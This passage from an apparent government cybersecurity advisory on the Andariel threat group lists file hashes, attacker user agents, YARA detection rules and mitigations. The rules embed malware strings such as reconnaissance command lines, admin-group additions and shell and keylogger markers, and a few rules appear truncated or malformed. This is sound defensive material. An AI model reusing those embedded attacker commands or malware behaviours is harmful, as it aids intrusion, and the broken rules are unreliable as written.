e7fd7f48fbf5635a04e302af50dfb651 33b2b5b7c830c34c688cf6ced287e5be e5410abaaac69c88db84ab3d0e9485ac eb35b75369805e7a6371577b1d2c4531 5a3f3f75048b9cec177838fb8b40b945 9d7bd0caed10cc002670faff7ca130f5 8434cdd34425916be234b19f933ad7ea bbaee4fe73ccff1097d635422fdc0483 79e474e056b4798e0a3e7c60dd67fd28 95c276215dcc1bd7606c0cb2be06bf70 426bb55531e8e3055c942a1a035e46b9 cfae52529468034dbbb40c9a985fa504 deae4be61c90ad6d499f5bdac5dad242 bda0686d02a8b7685adf937cbcd35f46 6de6c27ca8f4e00f0b3e8ff5185a59d1 c61a8c4f6f6870c7ca0013e084b893d2 5291aed100cc48415636c4875592f70c f4795f7aec4389c8323f7f40b50ae46f cf1a90e458966bcba8286d46d6ab052c 792370eb01e16ac3dc511143932d0e1d 612538328e0c4f3e445fb58ef811336a 9767aa592ec2d6ae3c7d40b6049d0466 b22fd0604c4f189f2b7a59c8f48882dd e53ca714787a86c13f07942a56d64efa c7b09f1dd0a5694de677f3ecceda41b7 c8346b39418f92725719f364068a218d 730bff14e80ffd7737a97cdf11362ab5 9a481bc83fea1dea3e3bdfff5e154d44 ddb1f970371fa32faae61fc5b8423d4b 6c2b947921e7c77d9af62ce9a3ed7621 977d30b261f64cc582b48960909d0a89 7ce51b56a6b0f8f78056ddfc5b5de67c dd9625be4a1201c6dfb205c12cf3a381 ecb4a09618e2aba77ea37bd011d7d7f7 0fd8c6f56c52c21c061a94e5765b27b4 c90d094a8fbeaa8a0083c7372bfc1897 0055a266aa536b2fdadb3336ef8d4fba 55bb271bbbf19108fec73d224c9b4218 0c046a2f5304ed8d768795a49b99d6e4 f34664e0d9a10974da117c1ca859dba8 a2c2099d503fcc29478205f5aef0283b e439f850aa8ead560c99a8d93e472225 7c30ed6a612a1fd252565300c03c7523 81738405a7783c09906da5c7212e606b c027d641c4c1e9d9ad048cda2af85db6 eb7ba9f7424dffdb7d695b00007a3c6d 3e9ee5982e3054dc76d3ba5cc88ae3de 073e3170a8e7537ff985ec8316319351 9b0e7c460a80f740d455a7521f0eada1 2d02f5499d35a8dffb4c8bc0b7fec5c2 0984954526232f7d05910aa5b07c5893 4156a7283284ece739e1bae05f99e17c 3026d419ee140f3c6acd5bff54132795 7aa132c0cc63a38fb4d1789553266fc7 1a0811472fad0ff507a92c957542fffd f8aef59d0c5afe8df31e11a1984fbc0a 82491b42b9a2d34b13137e36784a67d7 0a199944f757d5615164e8808a3c712a 9c97ea18da290a6833a1d36e2d419efc 16f768eac33f79775a9672018e0d64f5 The following include observed SHA-256 hashes: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6 db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984 773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df 05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe 1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb 6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1 b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be 66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66 def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563 323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9 74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643 1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5 c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4 452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694 db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984 c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740 34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947 664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54 772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51 aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54 9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238 c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c 8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b 38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07 The following include a list of user agent strings used by the actors: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Detection Methods See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors. Table 2. YARA Rules rule Andariel_ScheduledTask_Loader { strings: $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 } $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 } $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 } condition: uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3 } rule Andariel_KaosRAT_Yamabot { strings: $str1 = "/kaos/" $str2 = "Abstand [" $str3 = "] anwenden" $str4 = "cmVjYXB0Y2hh" $str5 = "/bin/sh" $str6 = "utilities.CIpaddress" $str7 = "engine.NewEgg" $str8 = "%s%04x%s%s%s" $str9 = "Y2FwdGNoYV9zZXNzaW9u" $str10 = "utilities.EierKochen" $str11 = "kandidatKaufhaus" condition: 3 of them } rule TriFaux_EasyRAT_JUPITER { strings: $InitOnce = "InitOnceExecuteOnce" $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A } $Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide condition: uint16(0) == 0x5a4d and all of them } rule Andariel_CutieDrop_MagicRAT { strings: $config_os_w = "os/windows" ascii wide $config_os_l = "os/linux" ascii wide $config_os_m = "os/mac" ascii wide $config_comp_msft = "company/microsoft" ascii wide $config_comp_orcl = "company/oracle" ascii wide $POST_field_1 = "session=" ascii wide $POST_field_2 = "type=" ascii wide $POST_field_3 = "id=" ascii wide $command_misspelled = "renmae" ascii wide condition: uint16(0) == 0x5a4d and 7 of them rule Andariel_hhsd_FileTransferTool { strings: // 30 4D C7 xor [rbp+buffer_v41+3], cl // 81 7D C4 22 C0 78 00 cmp dword ptr [rbp+buffer_v41], 78C022h // 44 88 83 00 01 00 00 mov [rbx+100h], r8b $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 } // B1 14 mov cl, 14h // C7 45 F7 14 00 41 00 mov [rbp+57h+Src], 410014h // C7 45 FB 7A 00 7F 00 mov [rbp+57h+var_5C], 7F007Ah // C7 45 FF 7B 00 63 00 mov [rbp+57h+var_58], 63007Bh // C7 45 03 7A 00 34 00 mov [rbp+57h+var_54], 34007Ah // C7 45 07 51 00 66 00 mov [rbp+57h+var_50], 660051h // C7 45 0B 66 00 7B 00 mov [rbp+57h+var_4C], 7B0066h // C7 45 0F 66 00 00 00 mov [rbp+57h+var_48], 66h ; 'f' $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 } // 41 02 D0 add dl, r8b // 44 02 DA add r11b, dl // 3C 1F cmp al, 1Fh $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F } // B9 8D 10 B7 F8 mov ecx, 0F8B7108Dh // E8 F1 BA FF FF call sub_140001280 $hash_call_loadlib = { B? 8D 10 B7 F8 E8 } $hash_call_unk = { B? 91 B8 F6 88 E8 } condition: uint16(0) == 0x5a4d and (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or 2 of ($handshake, $err_xor_str, $buf_add_cmp_1f) rule Andariel_Atharvan_3RAT {strings: $3RAT = "D:\\rang\\TOOL\\3RAT" $atharvan = "Atharvan_dll.pdb" condition: uint16(0) == 0x5a4d and any of them } rule Andariel_LilithRAT_Variant { strings: // The following are strings seen in the open source version of Lilith $lilith_1 = "Initiate a CMD session first." ascii wide $lilith_2 = "CMD is not open" ascii wide $lilith_3 = "Couldn't write command" ascii wide $lilith_4 = "Couldn't write to CMD: CMD not open" ascii wide // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith $unique_1 = "Upload Error!" ascii wide $unique_2 = "ERROR: Downloading is already running!" ascii wide $unique_3 = "ERROR: Unable to open file:" ascii wide $unique_4 = "General error" ascii wide $unique_5 = "CMD error" ascii wide $unique_6 = "killing self" ascii wide condition: uint16(0) == 0x5a4d and filesize 100 and #stackstrings > 5) } rule Andariel_GoLang_validalpha_handshake { strings: $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 } condition: all of them } rule Andariel_GoLang_validalpha_tasks { strings: $ = "main.ScreenMonitThread" $ = "main.CmdShell" $ = "main.GetAllFoldersAndFiles" $ = "main.SelfDelete" condition: all of them } rule Andariel_GoLang_validalpha_BlackString { strings: $ = "I:/01___Tools/02__RAT/Black" condition: uint16(0) == 0x5A4D and all of them } rule INDICATOR_EXE_Packed_VMProtect { strings: $s1 = ".vmp0" fullword ascii $s2 = ".vmp1" fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == ".vmp0" or pe.sections[i].name == ".vmp1" ) ) } rule INDICATOR_EXE_Packed_Themida { strings: $s1 = ".themida" fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == ".themida" ) ) } rule Andariel_elf_backdoor_fipps {strings: $a = "found mac address" $b = "RecvThread" $c = "OpenSSL-1.0.0-fipps" $d = "Disconnected!" condition: (all of them) and uint32(0) == 0x464c457f } rule Andariel_bindshell {strings: $str_comspec = "COMSPEC" $str_consolewindow = "GetConsoleWindow" $str_ShowWindow = "ShowWindow" $str_WSASocketA = "WSASocketA" $str_CreateProcessA = "CreateProcessA" $str_port = {B9 4D 05 00 00 89} condition: uint16(0) == 0x5A4D and all of them } rule Andariel_grease2 {strings: $str_rdpconf = "c: \\windows\\temp\\RDPConf.exe" fullword nocase $str_rdpwinst = "c: \\windows\\temp\\RDPWInst.exe" fullword nocase $str_net_user = "net user" $str_admins_add = "net localgroup administrators" condition: uint16(0) == 0x5A4D and all of them } rule Andariel_NoPineapple_Dtrack_unpacked {strings: $str_nopineapple = "" $str_qt_library = "Qt 5.12.10" $str_xor = {8B 10 83 F6 ?? 83 FA 01 77} condition: uint16(0) == 0x5A4D and all of them } rule Andariel_dtrack_unpacked {strings: $str_mutex = "MTX_Global" $str_cmd_1 = "/c net use \\\\" wide $str_cmd_2 = "/c ping -n 3 127.0.01 > NUL % echo EEE > \"%s\"" wide $str_cmd_3 = "/c move /y %s \\\\" wide $str_cmd_4 = "/c systeminfo > \"%s\" & tasklist > \"%s\" & netstat -naop tcp > \"%s\"" wide condition: uint16(0) == 0x5A4D and all of them } rule Andariel_TigerRAT_crowdsourced_rule { strings: $m1 = ".?AVModuleKeyLogger@@" fullword ascii $m2 = ".?AVModulePortForwarder@@" fullword ascii $m3 = ".?AVModuleScreenCapture@@" fullword ascii $m4 = ".?AVModuleShell@@" fullword ascii $s1 = "\\x9891-009942-xnopcopie.dat" fullword wide $s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii $s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii $s4 = "del \"%s\"%s \"%s\" goto " ascii $s5 = "[<<]" fullword ascii condition: uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*))) } rule win_tiger_rat_auto { strings: $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 } // n = 5, score = 200 // 33c0 | jmp 5 // 89442438 | dec eax // 89442430 | mov eax, ecx // 448bcf | movzx eax, byte ptr [eax] // 4533c0 | dec eax $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? } // n = 4, score = 200 // 41b901000000 | dec eax // 488bd6 | mov eax, dword ptr [ecx] // 488bcb | jmp 8 // e8???????? | $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 } // n = 4, score = 200 // 4881ec90050000 | test eax, eax // 8b01 | jns 0x16 // 8985c8040000 | dec eax // 8b4104 | mov eax, dword ptr [ecx] $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 } // n = 4, score = 200 // 488b01 | mov edx, esi // ff10 | dec eax // 488b4f08 | mov ecx, ebx // 4c8d4c2430 | inc ecx $sequence_4 = { 488b01 ff10 488b4e18 488b01 } // n = 4, score = 200 // 488b01 | dec eax // ff10 | cmp dword ptr [ecx + 0x18], 0x10 // 488b4e18 | dec eax // 488b01 | sub esp, 0x590 $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 } // n = 4, score = 200 // 4881eca0000000 | mov eax, dword ptr [ecx] // 33c0 | mov dword ptr [ebp + 0x4c8], eax // 488bd9 | mov eax, dword ptr [ecx + 4] // 488d4c2432 | mov dword ptr [ebp + 0x4d0], eax $sequence_6 = { 488b01 eb03 488bc1 0fb600 } // n = 4, score = 200 // 488b01 | inc ecx // eb03 | mov ebx, dword ptr [ebp + ebp] // 488bc1 | inc ecx // 0fb600 | movups xmmword ptr [edi], xmm0 $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 } // n = 5, score = 200 // 488b01 | sub esp, 0x30 // 8b10 | dec ecx // 895124 | mov ebx, eax // 448b4124 | dec eax // 4585c0 | mov ecx, eax $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 } // n = 4, score = 100 // 4c8d0d31eb0000 | jne 0x1e6 // c1e918 | dec eax // c1e808 | lea ecx, [0xbda0] // 41bf00000080 | dec esp $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 } // n = 7, score = 100 // 488bd8 | dec eax // 4885c0 | mov ebx, eax // 752d | dec eax // ff15???????? | // 83f857 | test eax, eax // 0f85e0010000 | jne 0x2f // 488d0da0bd0000 | cmp eax, 0x57 $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b } // n = 5, score = 100 // 75d4 | lea ecx, [0xeb31] // 488d1d7f6c0100 | shr ecx, 0x18 // 488b4bf8 | shr eax, 8 // 4885c9 | inc ecx // 740b | mov edi, 0x80000000 $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff } // n = 7, score = 100 // 0f85d9000000 | jne 0xffffffd6 // 488d15d0c90000 | dec eax // 41b810200100 | lea ebx, [0x16c7f] // 488bcd | dec eax // e8???????? | // eb6b | mov ecx, dword ptr [ebx - 8] // b9f4ffffff | dec eax $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? } // n = 6, score = 100 // 48890d???????? | // 488905???????? | // 488d05ae610000 | test ecx, ecx // 488905???????? | // 488d05a0550000 | je 0x10 // 488905???????? | $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 } // n = 6, score = 100 // 8bcf | mov eax, 0x12010 // e8???????? | // 488b7c2448 | dec eax // 85c0 | mov ecx, ebp // 0f8440030000 | jmp 0x83 // 488d0560250100 | mov ecx, 0xfffffff4 $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? } // n = 7, score = 100 // ff15???????? | // 8b05???????? | // 2305???????? | // ba02000000 | dec eax // 33c9 | lea eax, [0x61ae] // 8905???????? | // 8b05???????? | $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 } // n = 5, score = 100 // 4883ec30 | jne 0xdf // 498bd8 | dec eax // e8???????? | // 488bc8 | lea edx, [0xc9d0] // 4885c0 | inc ecx condition: 7 of them and filesize < 557056 } rule win_dtrack_auto { strings: $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } // n = 7, score = 400 // 52 | push edx // 8b4508 | mov eax, dword ptr [ebp + 8] // 50 | push eax // e8???????? | // 83c414 | add esp, 0x14 // 8b4d10 | mov ecx, dword ptr [ebp + 0x10] // 51 | push ecx $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 } // n = 7, score = 300 // 3a4101 | cmp al, byte ptr [ecx + 1] // 7523 | jne 0x25 // 83854cf6ffff02 | add dword ptr [ebp - 0x9b4], 2 // 838550f6ffff02 | add dword ptr [ebp - 0x9b0], 2 // 80bd4af6ffff00 | cmp byte ptr [ebp - 0x9b6], 0 // 75ae | jne 0xffffffb0 // c78544f6ffff00000000 | mov dword ptr [ebp - 0x9bc], 0 $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 } // n = 7, score = 300 // 50 | push eax // ff15???????? | // a3???????? | // 68???????? | // e8???????? | // 83c404 | add esp, 4 // 50 | push eax $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? } // n = 5, score = 300 // 8d8dd4faffff | lea ecx, [ebp - 0x52c] // 51 | push ecx // e8???????? | // 83c408 | add esp, 8 // 8b15???????? | $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? } // n = 5, score = 300 // 8855f5 | mov byte ptr [ebp - 0xb], dl // 6a5c | push 0x5c // 8b450c | mov eax, dword ptr [ebp + 0xc] // 50 | push eax // e8???????? | $sequence_5 = { 51 e8???????? 83c410 8b558c 52 } // n = 5, score = 300 // 51 | push ecx // e8???????? | // 83c410 | add esp, 0x10 // 8b558c | mov edx, dword ptr [ebp - 0x74] // 52 | push edx $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? } // n = 6, score = 300 // 8b4d0c | mov ecx, dword ptr [ebp + 0xc] // 51 | push ecx // 68???????? | // 8d9560eaffff | lea edx, [ebp - 0x15a0] // 52 | push edx // e8???????? | $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 } // n = 5, score = 300 // 83c001 | add eax, 1 // 8945f4 | mov dword ptr [ebp - 0xc], eax // 837df420 | cmp dword ptr [ebp - 0xc], 0x20 // 7d2c | jge 0x2e // 8b4df8 | mov ecx, dword ptr [ebp - 8] $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 } // n = 4, score = 300 // 83c001 | add eax, 1 // 89856cf6ffff | mov dword ptr [ebp - 0x994], eax // 8b8d70f6ffff | mov ecx, dword ptr [ebp - 0x990] // 8a11 | mov dl, byte ptr [ecx] $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 } // n = 6, score = 200 // 0355f0 | add edx, dword ptr [ebp - 0x10] // 0fb602 | movzx eax, byte ptr [edx] // 0fb64df7 | movzx ecx, byte ptr [ebp - 9] // 33c1 | xor eax, ecx // 0fb655fc | movzx edx, byte ptr [ebp - 4] // 33c2 | xor eax, edx $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 } // n = 5, score = 200 // d1e9 | shr ecx, 1 // 894df8 | mov dword ptr [ebp - 8], ecx // 8b5518 | mov edx, dword ptr [ebp + 0x18] // 8955fc | mov dword ptr [ebp - 4], edx // c745f000000000 | mov dword ptr [ebp - 0x10], 0 $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 } // n = 6, score = 200 // 8b4df0 | mov ecx, dword ptr [ebp - 0x10] // 3b4d10 | cmp ecx, dword ptr [ebp + 0x10] // 0f8d90000000 | jge 0x96 // 8b5508 | mov edx, dword ptr [ebp + 8] // 0355f0 | add edx, dword ptr [ebp - 0x10] // 0fb602 | movzx eax, byte ptr [edx] $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 } // n = 6, score = 200 // 894d14 | mov dword ptr [ebp + 0x14], ecx // 8b45f8 | mov eax, dword ptr [ebp - 8] // c1e018 | shl eax, 0x18 // 8b4dfc | mov ecx, dword ptr [ebp - 4] // c1e908 | shr ecx, 8 // 0bc1 | or eax, ecx $sequence_13 = { 0bc1 894518 8b5514 8955f8 } // n = 4, score = 200 // 0bc1 | or eax, ecx // 894518 | mov dword ptr [ebp + 0x18], eax // 8b5514 | mov edx, dword ptr [ebp + 0x14] // 8955f8 | mov dword ptr [ebp - 8], edx $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 } // n = 6, score = 200 // 8b5514 | mov edx, dword ptr [ebp + 0x14] // 8955f8 | mov dword ptr [ebp - 8], edx // 8b4518 | mov eax, dword ptr [ebp + 0x18] // 8945fc | mov dword ptr [ebp - 4], eax // e9???????? | // 8be5 | mov esp, ebp condition: 7 of them and filesize < 1736704 } Mitigation Measures The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. Log4Shell and Other Log4j Vulnerabilities Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version. Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0. Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation. Web Shell Malware Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells. Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs). Endpoint Activity Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets. Command Line Activity and Remote Access Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors. Packing Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications. Additional Mitigation Measures for Malicious Activities Check for security vulnerabilities, apply patches, and update to the latest version of software Encrypt all sensitive data including personal information Block access to unused ports Change passwords when they are suspected of being compromised Alert on unexpected use of dual-use applications Strengthen the subscriber identity authentication process for leased servers DPRK Rewards for Justice The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/. Acknowledgements Mandiant and Microsoft Threat Intelligence contributed to this CSA. Disclaimer of Endorsement Your organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law. The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors. Version History July 25, 2024: Initial version. August 6, 2024: Updated “Credential Access” and “Commodity Malware and Dual-Use Applications” sections. Trademark Recognition Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation. Purpose This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices. DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below. National Intelligence Service: www.nis.go.kr, +82 111 References AhnLab Security Emergency Response Center: https://asec.ahnlab.com/en/56405/ https://asec.ahnlab.com/en/59073/ https://asec.ahnlab.com/en/66088/ Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html Cisco Talos Intelligence blogs: https://blog.talosintelligence.com/lazarus-three-rats/ https://blog.talosintelligence.com/lazarus-magicrat/ https://blog.talosintelligence.com/lazarus-collectionrat/ https://blog.talosintelligence.com/lazarus-quiterat/ DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499 Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar JPCERT blogs: https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html https://blogs.jpcert.or.jp/en/2022/07/yamabot.html Mandiant blogs: https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023 https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government Microsoft blogs: 